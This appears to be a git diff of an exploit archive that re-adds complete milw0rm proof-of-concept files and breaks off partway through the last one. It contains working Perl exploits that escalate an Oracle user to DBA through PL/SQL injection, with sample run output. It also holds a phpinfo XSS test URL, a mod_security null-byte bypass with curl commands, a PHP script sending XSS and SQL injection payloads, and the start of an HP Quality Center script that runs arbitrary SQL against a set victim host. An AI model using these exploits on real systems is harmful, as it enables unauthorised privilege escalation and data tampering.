DBD::Oracle::st execute failed: ORA-31626: job does not exist -# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 -# ORA-06512: at "SYS.KUPV$FT", line 330 -# ORA-31638: cannot attach to job ' AND 0=BUNKER.own-- for user -# ORA-31632: master table ".' AND 0=BUNKER.own--" not found, invalid, or inaccessible -# ORA-00942: table or view does not exist -# ORA-06512: at line 6 (DBD ERROR: OCIStmtExecute) [for Statement " -# DECLARE -# J BOOLEAN; -# R NUMBER; -# BEGIN -# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=BUNKER.own--',J); -# END; -# "] at kupv-ft_attach_job.pl line 87. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare( qq{ -DECLARE - J BOOLEAN; R NUMBER; -BEGIN - R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=$user.own--',J); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-22] +#!/usr/bin/perl +# +# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/bid/16294 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Thu Feb 22 17:18:55 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_job.pl line 61. +# [-] Done! +# +# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about error)! +# DBD::Oracle::st execute failed: ORA-31626: job does not exist +# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 +# ORA-06512: at "SYS.KUPV$FT", line 330 +# ORA-31638: cannot attach to job ' AND 0=BUNKER.own-- for user +# ORA-31632: master table ".' AND 0=BUNKER.own--" not found, invalid, or inaccessible +# ORA-00942: table or view does not exist +# ORA-06512: at line 6 (DBD ERROR: OCIStmtExecute) [for Statement " +# DECLARE +# J BOOLEAN; +# R NUMBER; +# BEGIN +# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=BUNKER.own--',J); +# END; +# "] at kupv-ft_attach_job.pl line 87. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare( qq{ +DECLARE + J BOOLEAN; R NUMBER; +BEGIN + R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=$user.own--',J); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-22] diff --git a/platforms/multiple/remote/3363.pl b/platforms/multiple/remote/3363.pl index 195b75bbc..873533b90 100755 --- a/platforms/multiple/remote/3363.pl +++ b/platforms/multiple/remote/3363.pl @@ -1,122 +1,122 @@ -#!/usr/bin/perl -# -# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/bid/16287 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line 95. -# [-] Done! -# -# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||BUNKER.own||' for parameter OBJECT_TYPE in function GET_DDL -# ORA-06512: at "SYS.DBMS_METADATA", line 2576 -# ORA-06512: at "SYS.DBMS_METADATA", line 2627 -# ORA-06512: at "SYS.DBMS_METADATA", line 4220 -# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " -# DECLARE -# R CLOB; -# BEGIN -# R := SYS.DBMS_METADATA.GET_DDL('''||BUNKER.own||''',''); -# END; -# "] at dbms_meta_get_ddl.pl line 120. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare(qq{ -DECLARE - R CLOB; -BEGIN - R := SYS.DBMS_METADATA.GET_DDL('''||$user.own||''',''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-23] +#!/usr/bin/perl +# +# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/bid/16287 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line 95. +# [-] Done! +# +# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||BUNKER.own||' for parameter OBJECT_TYPE in function GET_DDL +# ORA-06512: at "SYS.DBMS_METADATA", line 2576 +# ORA-06512: at "SYS.DBMS_METADATA", line 2627 +# ORA-06512: at "SYS.DBMS_METADATA", line 4220 +# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " +# DECLARE +# R CLOB; +# BEGIN +# R := SYS.DBMS_METADATA.GET_DDL('''||BUNKER.own||''',''); +# END; +# "] at dbms_meta_get_ddl.pl line 120. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare(qq{ +DECLARE + R CLOB; +BEGIN + R := SYS.DBMS_METADATA.GET_DDL('''||$user.own||''',''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-23] diff --git a/platforms/multiple/remote/3405.txt b/platforms/multiple/remote/3405.txt index b36b2ca08..c81e55bd7 100755 --- a/platforms/multiple/remote/3405.txt +++ b/platforms/multiple/remote/3405.txt @@ -1,18 +1,18 @@ - //////////////////////////////////////////////////////////////////////// - // _ _ _ _ ___ _ _ ___ // - // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // - // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // - // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // - // // - // Proof of concept code from the Hardened-PHP Project // - // (C) Copyright 2007 Stefan Esser // - // // - //////////////////////////////////////////////////////////////////////// - // PHP 4 - phpinfo() XSS Testcase // - //////////////////////////////////////////////////////////////////////// - -To manually test for this vulnerability just call the phpinfo() page with a parameter like this. - -http://localhost/phpinfo.php?a[]= - -# milw0rm.com [2007-03-04] + //////////////////////////////////////////////////////////////////////// + // _ _ _ _ ___ _ _ ___ // + // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // + // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // + // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // + // // + // Proof of concept code from the Hardened-PHP Project // + // (C) Copyright 2007 Stefan Esser // + // // + //////////////////////////////////////////////////////////////////////// + // PHP 4 - phpinfo() XSS Testcase // + //////////////////////////////////////////////////////////////////////// + +To manually test for this vulnerability just call the phpinfo() page with a parameter like this. + +http://localhost/phpinfo.php?a[]= + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/remote/3425.txt b/platforms/multiple/remote/3425.txt index 7df0af788..800970969 100755 --- a/platforms/multiple/remote/3425.txt +++ b/platforms/multiple/remote/3425.txt @@ -1,48 +1,48 @@ -mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability -http://www.php-security.org/MOPB/BONUS-12-2007.html - -Affected is mod_security <= 2.1.0 Detailed information - -Detailed information - -When mod_security receives a request it parses it into web application -parameters in a way it believes is correct. Because the way it parses -the incoming data follows the rules defined in RFCs and not the reality -of how the HTTP request parsers are implemented in Perl, Python, Java, -PHP there are a number of bypass vulnerabilities when the RFC and -reality mismatch. - -One of the these differences is the way ASCIIZ bytes are handled when -they occur in POST data of the application/x-www-form-urlencoded -content-type. Because mod_security handles POST data of this kind as a C -string it does not touch anything behind the first ASCIIZ byte because -in the eyes of mod_security this is the end of the data. - -Unfortunately for mod_security this is not how the HTTP parsers of the -different script languages handle this situation. Most script languages -(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if -it is legal. Since PHP 5.2.0 this also applies to PHP. Proof of concept, -exploit or instructions to reproduce - - - -Now call it with a command like - -$ echo -e "&var=" > postdata -$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent - - -The example should not be blocked (because this is the default -configuration) but in your error.log you will find a line saying that a -possible XSS attack was detected. - -Now try the same with a ASCIIZ byte embedded. - -$ echo -e "\000&var=" > postdata -$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent - - -This time there should be no log message in your error.log, because -mod_security cannot see the var parameter behind the ASCIIZ byte. - -# milw0rm.com [2007-03-07] +mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability +http://www.php-security.org/MOPB/BONUS-12-2007.html + +Affected is mod_security <= 2.1.0 Detailed information + +Detailed information + +When mod_security receives a request it parses it into web application +parameters in a way it believes is correct. Because the way it parses +the incoming data follows the rules defined in RFCs and not the reality +of how the HTTP request parsers are implemented in Perl, Python, Java, +PHP there are a number of bypass vulnerabilities when the RFC and +reality mismatch. + +One of the these differences is the way ASCIIZ bytes are handled when +they occur in POST data of the application/x-www-form-urlencoded +content-type. Because mod_security handles POST data of this kind as a C +string it does not touch anything behind the first ASCIIZ byte because +in the eyes of mod_security this is the end of the data. + +Unfortunately for mod_security this is not how the HTTP parsers of the +different script languages handle this situation. Most script languages +(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if +it is legal. Since PHP 5.2.0 this also applies to PHP. Proof of concept, +exploit or instructions to reproduce + + + +Now call it with a command like + +$ echo -e "&var=" > postdata +$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent + + +The example should not be blocked (because this is the default +configuration) but in your error.log you will find a line saying that a +possible XSS attack was detected. + +Now try the same with a ASCIIZ byte embedded. + +$ echo -e "\000&var=" > postdata +$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent + + +This time there should be no log message in your error.log, because +mod_security cannot see the var parameter behind the ASCIIZ byte. + +# milw0rm.com [2007-03-07] diff --git a/platforms/multiple/remote/3452.php b/platforms/multiple/remote/3452.php index c015b4625..15ff9e0bb 100755 --- a/platforms/multiple/remote/3452.php +++ b/platforms/multiple/remote/3452.php @@ -1,54 +1,54 @@ -alert(/XSS/);"; - $_POST['var2'] = " ' UNION SELECT "; - - $url = "http://127.0.0.1/info.php"; - - // You do not need to change anything below this - - $outfdf = fdf_create(); - foreach ($_POST as $key => $value) { - fdf_set_value($outfdf, $key, $value, 0); - } - fdf_save($outfdf, "outtest.fdf"); - fdf_close($outfdf); - - $ret = file_get_contents("outtest.fdf"); - unlink("outtest.fdf"); - - $params = array('http' => array( - 'method' => 'POST', - 'content' => $ret, - 'header' => 'Content-Type: application/vnd.fdf' - )); - - $ctx = stream_context_create($params); - $fp = @fopen($url, 'rb', false, $ctx); - if (!$fp) { - die("Cannot open $url"); - } - $response = @stream_get_contents($fp); - - echo $response; - echo "\n"; -?> - -# milw0rm.com [2007-03-10] +alert(/XSS/);"; + $_POST['var2'] = " ' UNION SELECT "; + + $url = "http://127.0.0.1/info.php"; + + // You do not need to change anything below this + + $outfdf = fdf_create(); + foreach ($_POST as $key => $value) { + fdf_set_value($outfdf, $key, $value, 0); + } + fdf_save($outfdf, "outtest.fdf"); + fdf_close($outfdf); + + $ret = file_get_contents("outtest.fdf"); + unlink("outtest.fdf"); + + $params = array('http' => array( + 'method' => 'POST', + 'content' => $ret, + 'header' => 'Content-Type: application/vnd.fdf' + )); + + $ctx = stream_context_create($params); + $fp = @fopen($url, 'rb', false, $ctx); + if (!$fp) { + die("Cannot open $url"); + } + $response = @stream_get_contents($fp); + + echo $response; + echo "\n"; +?> + +# milw0rm.com [2007-03-10] diff --git a/platforms/multiple/remote/3585.pl b/platforms/multiple/remote/3585.pl index b1fc0a4ac..995f3a6c8 100755 --- a/platforms/multiple/remote/3585.pl +++ b/platforms/multiple/remote/3585.pl @@ -1,112 +1,112 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPM$MCP.MAIN exploit (10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.red-database-security.com/ -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97. -# [-] Done! -# -# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--',''); -# END;"] at kupm-mcpmain.pl line 119. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare( qq{ -BEGIN - SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--',''); -END;}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-03-27] +#!/usr/bin/perl +# +# Remote Oracle KUPM$MCP.MAIN exploit (10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.red-database-security.com/ +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97. +# [-] Done! +# +# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--',''); +# END;"] at kupm-mcpmain.pl line 119. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare( qq{ +BEGIN + SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--',''); +END;}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-03-27] diff --git a/platforms/multiple/remote/3654.pl b/platforms/multiple/remote/3654.pl index 5bc67df76..3a4c2f85e 100755 --- a/platforms/multiple/remote/3654.pl +++ b/platforms/multiple/remote/3654.pl @@ -1,165 +1,165 @@ -#!/usr/bin/perl -#****************************************************************** -# HP Mercury Quality Center runQuery exploit. -# Run whatever SQL you want on there db - without SQL injection. -# Problem is client can do "RunQuery" command os we write program -# to do this. Client can lots other things it should not also! -# The backend database can be MSSQLServer or Oracle or nearly often -# MSDE. This changes SQL types you can send. This is a blind SQL -# attack but may be is it possible to get data out somehow? -# -# Copyright 2007 Isma Khan - Code may be freedly usuable on other -# exploits as long as name appears. -# ****************************************************************** -use IO::Socket; -my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='paul_qc'"; - -#my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='isma-khan'"; -# victim - Put yur victims hostname here. -# vicport - Port to connect on. -# u - username to login to quality center. This user provided. -# p - Psswrd to login ot quality center. Try default passwords. -# domain - A domain thhat user has access to. -# project - A proj that user has access to. -my $victim = '192.168.0.2'; -my $vicport = 8080; -my $u = 'alex_qc'; -my $p= ''; -my $domain = 'DEFAULT'; -my $project = 'QualityCenter_Demo'; - -# ****** Login to HPQMC ******************* -print "Login\n"; -my @bits; -push @bits, AddString('Login'); -push @bits, "\"0:int:1\""; -push @bits, "\"0:int:-1\""; -push @bits, "\"0:int:-1\""; -push @bits, AddString("{\r\nUSER_NAME:$u,\r\nPASSWORD:" . SmolkaEncript($p) . ",\r\nCLIENTTYPE:\\00000018\\Quality Center Client UI\r\n}\r\n"); -my $tmphost="0:conststr:Bannu"; -push @bits, "\\" . MakeHex($tmphost) . "\\" . $tmphost; -push @bits, "\"65536:str:0\""; -push @bits, "\"0:pint:0\""; -push @bits, "\"0:pint:0\""; -push @bits, "\"0:pint:0\""; - -my $res=HTTPSending(@bits); -undef @bits; -my ($sesid) = $res =~ /ID:(\d+)/; -die "Not login\n" unless($sesid); -print "Session ID: $sesid\n"; - -# ***** Connect to project ********* -print "Connect to project\n"; -push @bits, AddString('ConnectProject'); -push @bits, "\"0:int:2\""; -push @bits, "\"0:int:$sesid\""; -push @bits, "\"0:int:-1\""; -push @bits, AddString("{\r\nDOMAIN_NAME:$domain,\r\nPROJECT_NAME:\\" . MakeHex($project) . "\\$project\r\n}\r\n"); -push @bits, "\"65536:str:0\""; -push @bits, "\"0:pint:0\""; -$res = HTTPSending(@bits); -undef @bits; -my ($psesid) = $res =~ /ID:(\d+)/; -die "Not project\n" unless($psesid); -print "Project Session ID: $psesid\n"; - -# ******** Run the SQL ***** -print 